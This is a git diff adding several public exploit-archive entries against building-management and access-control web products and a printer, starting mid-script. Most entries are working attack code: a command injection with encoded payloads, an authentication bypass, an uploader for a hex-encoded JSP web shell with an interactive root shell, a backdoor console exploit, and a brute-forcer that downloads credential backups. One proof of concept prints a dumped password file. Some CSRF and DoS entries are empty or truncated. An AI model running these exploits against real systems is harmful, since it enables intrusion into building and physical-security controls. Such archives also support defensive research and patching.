\"" % __file__
+ exit(0)
+
+print "------------==[CBAS Web v18 Remote Command Injection\n"
+
+# Set host, cookie and URL
+host = sys.argv[1]
+cookies = {'PHPSESSID': 'comparemetoasummersday'}
+url = "http://%s/" % host
+
+debug_print("URL: %s" % url)
+
+# Command to execute
+# Only use single quotes in cmd pls
+icmd = sys.argv[2]
+if '"' in icmd:
+ debug_print("Please don't use double quotes in your command string", level = 1)
+ exit(0)
+
+debug_print("Executing: %s" % icmd)
+
+# URL for performing auth bypass by setting the auth cookie flag to true
+auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test"
+# URL for removing auth flag from cookie (for clean-up)
+logout_sess_req = "cbas/index.php?m=auth&a=logout"
+# URL for command injection and session validity checking
+json_checks_req = "cbas/json.php"
+
+# Perform logout
+def do_logout():
+ requests.get(url + logout_sess_req, cookies = cookies)
+
+# Check if out cookie has the authentication flag
+def has_auth():
+ ret = requests.get(url + json_checks_req, cookies = cookies)
+ if ret.text == "Access Forbidden":
+ return False
+ return True
+
+# Set auth flag on cookie
+def set_auth():
+ requests.get(url + auth_bypass_req, cookies = cookies)
+
+# =======================================================
+
+# Perform auth bypass if not authenticated yet
+if not has_auth():
+ debug_print("Cookie not yet authenticated")
+ debug_print("Setting auth flag on cookie via auth bypass..")
+ set_auth()
+
+# Check if bypass failed
+if not has_auth():
+ debug_print("Was not able to perform authorization bypass :(")
+ debug_print("Exploit failed, quitting..", level = 1)
+ exit(0)
+
+else:
+ debug_print("Cookie is authenticated")
+ debug_print("Creating Python payload..")
+
+ # Payload has to be encoded because the server uses the following filtering in exectools.php:
+ # $bad = array("..", "\\", "&", "|", ";", '/', '>', '<');
+ # So no slashes, etc. This means only two "'layers' of quotes"
+
+ # Create python code exec code
+ cmd_python = 'import os; os.system("%s")' % icmd
+ # Convert to Python array
+ cmd_array_string = str([ord(x) for x in cmd_python])
+ # Create command injection string
+ p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string
+ # Base64 encode for p parameter
+ p_encoded = b.b64encode(p_unencoded)
+
+ # Execute command
+ debug_print("Sending Python payload..")
+ ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})
+
+ # Parse result
+ ret_parsed = json.loads(ret.text)
+ try:
+ metadata = ret_parsed["metadata"]
+ identifier = metadata["identifier"]
+
+ debug_print("Server says:")
+ print identifier
+
+ # JSON Parsing error
+ except:
+ debug_print("Error parsing result from server :(", level = 1)
+
+# Uncomment if you want the cookie to be removed after use
+# debug_print("Logging out")
+# do_logout()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47628.txt b/exploits/hardware/webapps/47628.txt
new file mode 100644
index 000000000..c42c9ef24
--- /dev/null
+++ b/exploits/hardware/webapps/47628.txt
@@ -0,0 +1,30 @@
+# Exploit Title: CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : CVE-2019-10847
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47630.txt b/exploits/hardware/webapps/47630.txt
new file mode 100644
index 000000000..ea1380700
--- /dev/null
+++ b/exploits/hardware/webapps/47630.txt
@@ -0,0 +1,35 @@
+# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : CVE-2019-10848
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# Testing for non-valid user:
+
+POST /cbas/index.php?m=auth&a=login HTTP/1.1
+
+username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
+
+# Response for non-valid user:
+
+
+randomuser
+
+========================================================================
+
+Testing for valid user:
+
+POST /cbas/index.php?m=auth&a=login HTTP/1.1
+
+username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s
+
+# Response for valid user:
+
+
+Invalid username/password combination. Please try again!
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47634.txt b/exploits/hardware/webapps/47634.txt
new file mode 100644
index 000000000..b269918ba
--- /dev/null
+++ b/exploits/hardware/webapps/47634.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.3.35
+# Tested on: NA
+# CVE : CVE-2019-9189
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Prima Access Control 2.3.35 Authenticated Stored XSS
+
+# PoC
+
+---
+
+POST /bin/sysfcgi.fx HTTP/1.1
+Host: 192.168.13.37
+Connection: keep-alive
+Content-Length: 572
+Origin: https://192.168.13.37
+Session-ID: 5682699
+User-Agent: Mozi-Mozi/44.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: text/html, */*; q=0.01
+Session-Pc: 2
+X-Requested-With: XMLHttpRequest
+Referer: https://192.168.13.37/app/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: G_ENABLED_IDPS=google
+
+> /www/pages/app/images/logos/testingus2.txt")"/>
+
+Result:
+
+$ curl https://192.168.13.37/app/images/logos/testingus2.txt
+root:x:0:0:root:/home/root:/bin/sh
+daemon:x:1:1:daemon:/usr/sbin:/bin/false
+bin:x:2:2:bin:/bin:/bin/false
+sys:x:3:3:sys:/dev:/bin/false
+sync:x:4:100:sync:/bin:/bin/sync
+mail:x:8:8:mail:/var/spool/mail:/bin/false
+www-data:x:33:33:www-data:/var/www:/bin/false
+operator:x:37:37:Operator:/var:/bin/false
+nobody:x:99:99:nobody:/home:/bin/false
+python:x:1000:1000:python:/home/python:/bin/false
+admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh
+uid=0(root) gid=0(root) groups=0(root),10(wheel)
+Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47636.txt b/exploits/hardware/webapps/47636.txt
new file mode 100644
index 000000000..7887013bc
--- /dev/null
+++ b/exploits/hardware/webapps/47636.txt
@@ -0,0 +1,174 @@
+# Title: Optergy 2.3.0a - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7274
+
+#!/usr/bin/env python
+# -*- coding: utf8 -*-
+#
+##########################################################################
+#
+# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
+# [+] Usage: optergy_rfm.py http://IP
+# [+] Example: optergy_rfm.py http://10.0.0.17
+#
+# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19
+# Enter username: podroom
+# Enter password: podroom
+#
+# Welcome to Optergy HTTP Shell!
+# You can navigate to: http://192.168.232.19/images/jox.jsp
+# Or you can continue using this 'shell'.
+# Type 'exit' for exit.
+#
+# root@192.168.232.19:~# id
+# uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
+# root@192.168.232.19:~# sudo id
+# uid=0(root) gid=0(root) groups=0(root)
+# root@192.168.232.19:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
+#
+# root@192.168.232.19:~# exit
+# Have a nice day!
+#
+##########################################################################
+
+import requests
+import sys,os,time,re
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+ print "[+] Usage: " + piton + " http://IP"
+ print "[+] Example: " + piton + " http://10.0.0.17\n"
+ sys.exit()
+
+the_user = raw_input("Enter username: ")
+the_pass = raw_input("Enter password: ")
+the_host = sys.argv[1]
+odi = requests.Session()
+
+the_url = the_host + "/ajax/AjaxLogin.html?login"
+the_headers = {"Accept" : "*/*",
+ "X-Requested-With" : "XMLHttpRequest",
+ "User-Agent" : "Noproblem/16.0",
+ "Content-Type" : "application/x-www-form-urlencoded",
+ "Accept-Encoding" : "gzip, deflate",
+ "Accept-Language" : "en-US,en;q=0.9"}
+
+the_data = {"username" : the_user,
+ "password" : the_pass,
+ "token" : ''}
+
+odi.post(the_url, headers = the_headers, data = the_data)
+
+the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64"
+ "\x65\x72\x2e\x68\x74\x6d\x6c\x3f\x69\x64\x54\x6f\x55\x73\x65\x3d"
+ "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
+ "\x30\x32\x33\x36\x39\x39\x33\x39\x26\x64\x65\x63\x6f\x6d\x70\x72"
+ "\x65\x73\x73\x3d\x66\x61\x6c\x73\x65\x26\x6f\x75\x74\x70\x75\x74"
+ "\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x25\x32\x46\x75\x73\x72\x25"
+ "\x32\x46\x6c\x6f\x63\x61\x6c\x25\x32\x46\x74\x6f\x6d\x63\x61\x74"
+ "\x25\x32\x46\x77\x65\x62\x61\x70\x70\x73\x25\x32\x46\x52\x4f\x4f"
+ "\x54\x25\x32\x46\x69\x6d\x61\x67\x65\x73\x25\x32\x46\x26\x66\x69"
+ "\x6c\x65\x4e\x61\x6d\x65\x3d\x6a\x6f\x78\x2e\x6a\x73\x70")######"
+
+the_url = the_host + the_upl
+the_headers = {"Cache-Control" : "max-age=0",
+ "Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
+ "User-Agent" : "Noproblem/16.0",
+ "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
+ "Accept-Encoding" : "gzip, deflate",
+ "Accept-Language" : "en-US,en;q=0.9"}
+
+the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d"
+ "\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50"
+ "\x59\x55\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e"
+ "\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66"
+ "\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22"
+ "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
+ "\x30\x32\x33\x36\x39\x39\x33\x39\x22\x3b\x20\x66\x69\x6c\x65\x6e"
+ "\x61\x6d\x65\x3d\x22\x6a\x6f\x78\x2e\x6a\x73\x70\x22\x0d\x0a\x43"
+ "\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70"
+ "\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73"
+ "\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x3c\x25\x40\x20\x70\x61\x67"
+ "\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e\x75"
+ "\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a\x22"
+ "\x25\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x3c\x42\x4f\x44\x59\x3e\x0a"
+ "\x3c\x46\x4f\x52\x4d\x20\x4d\x45\x54\x48\x4f\x44\x3d\x22\x47\x45"
+ "\x54\x22\x20\x4e\x41\x4d\x45\x3d\x22\x6d\x79\x66\x6f\x72\x6d\x22"
+ "\x20\x41\x43\x54\x49\x4f\x4e\x3d\x22\x22\x3e\x0a\x3c\x49\x4e\x50"
+ "\x55\x54\x20\x54\x59\x50\x45\x3d\x22\x74\x65\x78\x74\x22\x20\x4e"
+ "\x41\x4d\x45\x3d\x22\x63\x6d\x64\x22\x3e\x0a\x3c\x49\x4e\x50\x55"
+ "\x54\x20\x54\x59\x50\x45\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x20"
+ "\x56\x41\x4c\x55\x45\x3d\x22\x53\x65\x6e\x64\x22\x3e\x0a\x3c\x2f"
+ "\x46\x4f\x52\x4d\x3e\x0a\x3c\x70\x72\x65\x3e\x0a\x3c\x25\x0a\x69"
+ "\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
+ "\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x20\x21"
+ "\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20"
+ "\x20\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x43"
+ "\x6f\x6d\x6d\x61\x6e\x64\x3a\x20\x22\x20\x2b\x20\x72\x65\x71\x75"
+ "\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72"
+ "\x28\x22\x63\x6d\x64\x22\x29\x20\x2b\x20\x22\x3c\x42\x52\x3e\x22"
+ "\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x50\x72\x6f\x63\x65"
+ "\x73\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
+ "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63"
+ "\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
+ "\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x29\x3b\x0a\x20"
+ "\x20\x20\x20\x20\x20\x20\x20\x4f\x75\x74\x70\x75\x74\x53\x74\x72"
+ "\x65\x61\x6d\x20\x6f\x73\x20\x3d\x20\x70\x2e\x67\x65\x74\x4f\x75"
+ "\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20"
+ "\x20\x20\x20\x20\x20\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61"
+ "\x6d\x20\x69\x6e\x20\x3d\x20\x70\x2e\x67\x65\x74\x49\x6e\x70\x75"
+ "\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20\x20\x20\x20"
+ "\x20\x20\x20\x44\x61\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
+ "\x61\x6d\x20\x64\x69\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74"
+ "\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x69\x6e\x29"
+ "\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\x74\x72\x69\x6e\x67"
+ "\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64"
+ "\x4c\x69\x6e\x65\x28\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20"
+ "\x77\x68\x69\x6c\x65\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20"
+ "\x6e\x75\x6c\x6c\x20\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20"
+ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x2e\x70\x72\x69"
+ "\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x0a\x20\x20\x20"
+ "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x73"
+ "\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65"
+ "\x28\x29\x3b\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+ "\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d"
+ "\x0a\x25\x3e\x0a\x3c\x2f\x70\x72\x65\x3e\x0a\x3c\x2f\x42\x4f\x44"
+ "\x59\x3e\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a\x0a\x0a\x0d\x0a\x2d\x2d"
+ "\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d\x42\x6f"
+ "\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50\x59\x55"
+ "\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
+ "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72"
+ "\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70"
+ "\x6c\x6f\x61\x64\x22\x0d\x0a\x0d\x0a\x55\x70\x6c\x6f\x61\x64\x0d"
+ "\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72"
+ "\x6d\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51"
+ "\x50\x59\x55\x4f\x44\x53\x57\x42\x6c\x2d\x2d\x0d\x0a")##########"
+
+odi.post(the_url, headers = the_headers, data = the_data)
+
+print "\nWelcome to Optergy HTTP Shell!"
+print "You can navigate to: " + the_host + "/images/jox.jsp"
+print "Or you can continue using this 'shell'."
+print "Type 'exit' for exit.\n"
+
+while True:
+ try:
+ cmd = raw_input("root@" + the_host[7:] + ":~# ")
+ if cmd.strip() == "exit":
+ print "Have a nice day!"
+ break
+ paramz = {"cmd" : cmd} # sudo cmd
+ shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
+ regex = re.search(r"BR>(.*?)", shell.text, flags = re.S)
+ print regex.group(1).strip()
+ except Exception:
+ break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47638.sh b/exploits/hardware/webapps/47638.sh
new file mode 100755
index 000000000..985d3b204
--- /dev/null
+++ b/exploits/hardware/webapps/47638.sh
@@ -0,0 +1,57 @@
+# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.4.9api3
+# Tested on: NA
+# CVE : CVE-2019-9189
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# PoC
+
+#!/bin/bash
+#
+# Command injection with root privileges in FlexAir Access Control (Prima Systems)
+# Firmware version: <= 2.3.38
+
+#
+# Discovered by Sipke Mellema
+# Updated: 14.01.2019
+#
+##########################################################################
+#
+# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
+# Executing: id
+# Output:
+# uid=0(root) gid=0(root) groups=0(root),10(wheel)
+# Removing temporary file..
+# Done
+#
+##########################################################################
+# Output file on the server
+OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
+# Command to execute
+CMD="$2"
+# IP address
+IP="$1"
+# Change HTTP to HTTPS if required
+HOST="http://${IP}"
+# Add output file
+CMD_FULL="${CMD}>${OUTPUT_FILE}"
+# Command injection payload. Be careful with single quotes!
+PAYLOAD=""
+
+# Perform exploit
+echo "Executing: ${CMD}"
+curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
+# Get output
+echo "Output:"
+curl -s "${HOST}/app/images/logos/output.txt"
+# Remove temp file
+echo "Removing temporary file.."
+PAYLOAD=""
+curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
+echo "Done"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47639.txt b/exploits/hardware/webapps/47639.txt
new file mode 100644
index 000000000..d878948e6
--- /dev/null
+++ b/exploits/hardware/webapps/47639.txt
@@ -0,0 +1,160 @@
+# Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7273
+
+# Optergy Proton/Enterprise BMS CSRF Add Admin
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47640.txt b/exploits/hardware/webapps/47640.txt
new file mode 100644
index 000000000..e20c255e4
--- /dev/null
+++ b/exploits/hardware/webapps/47640.txt
@@ -0,0 +1,27 @@
+# Title: Optergy 2.3.0a - Username Disclosure
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7272
+
+# PoC:
+
+curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47641.py b/exploits/hardware/webapps/47641.py
new file mode 100755
index 000000000..7cd19fe9f
--- /dev/null
+++ b/exploits/hardware/webapps/47641.py
@@ -0,0 +1,83 @@
+# Title: Optergy 2.3.0a - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7276
+
+# PoC:
+
+#!/usr/bin/env python
+#
+# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
+#
+# Affected version <=2.0.3a (Proton and Enterprise)
+#
+##############################################################################
+#
+# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
+# Challenge received: 1547540929287
+# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
+# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
+# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
+# # id
+# uid=0(root) gid=0(root) groups=0(root)
+#
+##############################################################################
+#
+#
+
+import os#######
+import sys######
+import json#####
+import hashlib##
+import requests#
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+ print '\n\x20\x20[*] Usage: '+piton+' \n'
+ sys.exit()
+
+while True:
+
+ challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
+
+ try:
+ req1 = requests.get(challenge_url)
+ get_challenge = json.loads(req1.text)
+ challenge = get_challenge['response']['message']
+ print 'Challenge received: ' + challenge
+
+ hash_object = hashlib.sha1(challenge.encode())
+ print 'SHA1: '+(hash_object.hexdigest())
+ h1 = (hash_object.hexdigest())
+ hash_object = hashlib.md5(h1.encode())
+ print 'MD5 from SHA1: '+(hash_object.hexdigest())
+ h2 = (hash_object.hexdigest())
+ print 'Answer: '+h1+h2
+
+ zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
+ zeCommand = raw_input('# ')
+ if zeCommand.strip() == 'exit':
+ sys.exit()
+ zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
+ 'Accept' : '*/*',
+ 'Accept-Encoding' : 'gzip, deflate',
+ 'Accept-Language' : 'mk-MK,mk;q=1.7',
+ 'Connection' : 'keep-alive',
+ 'Connection-Type' : 'application/x-www-form-urlencoded'}
+ zePardata = {'command' : 'sudo '+zeCommand,
+ 'challenge' : challenge,
+ 'answer' : h1+h2}
+
+ zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
+ get_resp = json.loads(zeRequest.text)
+ get_answ = get_resp['response']['message']
+ print get_answ
+ except Exception:
+ print '[*] Error!'
+ break
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47644.py b/exploits/hardware/webapps/47644.py
new file mode 100755
index 000000000..0fb7f27a2
--- /dev/null
+++ b/exploits/hardware/webapps/47644.py
@@ -0,0 +1,97 @@
+# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.3.35
+# Tested on: NA
+# CVE : CVE-2019-7666, CVE-2019-7667
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+#!/usr/bin/env python
+# -*- coding: utf8 -*-
+#
+# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
+# Authentication Bypass (Login with MD5 hash)
+#
+# Older versions: /links/Nova_Config_2019-01-03.bck
+# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
+# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
+# Fixed versions: 2.4
+#
+###################################################################################
+#
+# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
+# [+] Please wait while fetchin the backup config file...
+# [+] Found some juice!
+# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
+# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
+# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
+# SQLite version 3.22.0 2018-01-22 18:45:57
+# Enter ".help" for usage hints.
+# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
+# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
+# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
+# sqlite> .q
+# lqwrm@metalgear:~/stuff/prima$
+#
+###################################################################################
+#
+# 11.01.2019
+#
+
+import os#######
+import sys######
+import time#####
+import requests#
+
+from datetime import timedelta, date
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+ print '[+] Usage: '+piton+' [target]'
+ print '[+] Target example 1: http://10.0.0.17:8080'
+ print '[+] Target example 2: https://primanova.tld\n'
+ sys.exit()
+
+host = sys.argv[1]
+
+def datum(start_date, end_date):
+ for n in range(int ((end_date - start_date).days)):
+ yield start_date + timedelta(n)
+
+start_date = date(2017, 1, 1)
+end_date = date(2019, 12, 30)
+
+print '[+] Please wait while fetchin the backup config file...'
+
+def spinning_cursor():
+ while True:
+ for cursor in '|/-\\':
+ yield cursor
+
+spinner = spinning_cursor()
+
+for mooshoo in datum(start_date, end_date):
+ sys.stdout.write(next(spinner))
+ sys.stdout.flush()
+ time.sleep(0.1)
+ sys.stdout.write('\b')
+ h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
+
+ if (h.status_code) == 200:
+ print '[+] Found some juice!'
+ print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
+ timestr = time.strftime('%H%M%S')
+ time.sleep(1)
+ open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
+ print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
+ sys.exit()
+
+print '[-] No backup for you today. :('
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47648.txt b/exploits/hardware/webapps/47648.txt
new file mode 100644
index 000000000..b23b94ced
--- /dev/null
+++ b/exploits/hardware/webapps/47648.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Bematech Printer MP-4200 - Denial of Service
+# Date: 2019-11-11
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: https://www.bematech.com.br/
+# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
+# Version: MP-4200 TH
+# Tested on: Windows and Linux
+# CVE : N/A
+
+DoS Poc:
+--------------------------------------------------------------------------------------------------------
+POST /en/conf_admin.html HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/73.0.3683.75 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,pt;q=0.8
+Cache-Control: max-age=0
+Referer: http://TARGET/en/conf_admin.html
+Content-Length: 40
+Content-Type: application/x-www-form-urlencoded
+
